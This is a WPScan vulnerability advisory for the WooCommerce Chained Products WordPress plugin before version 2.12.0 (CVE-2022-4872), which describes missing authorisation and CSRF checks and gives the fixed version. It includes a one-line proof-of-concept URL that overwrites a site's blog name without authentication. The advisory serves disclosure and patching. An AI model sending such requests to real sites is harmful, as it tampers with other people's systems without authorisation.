WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WooCommerce Chained Products < 2.12.0 - Unauthenticated Arbitrary Options Update to 'no'

Description

The plugin does not have authorisation and CSRF checks, as well as does not ensure that the option to be updated belong to the plugin, allowing unauthenticated attackers to set arbitrary options to 'no'

Proof of Concept

As unauthenticated, open the following URL to set the Blog Name to 'no': https://example.com/wp-admin/admin-post.php?cp_dismiss_admin_notice=1&option_name=blogname

Affects Plugins

woocommerce-chained-products
Fixed in version 2.12.0

References

CVE
CVE-2022-4872

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID
c76a1c0b-8a5b-4639-85b6-9eebc63c3aa6

Timeline

Publicly Published

2023-01-04 (about 2 months ago)

Added

2023-01-04 (about 2 months ago)

Last Updated

2023-01-04 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin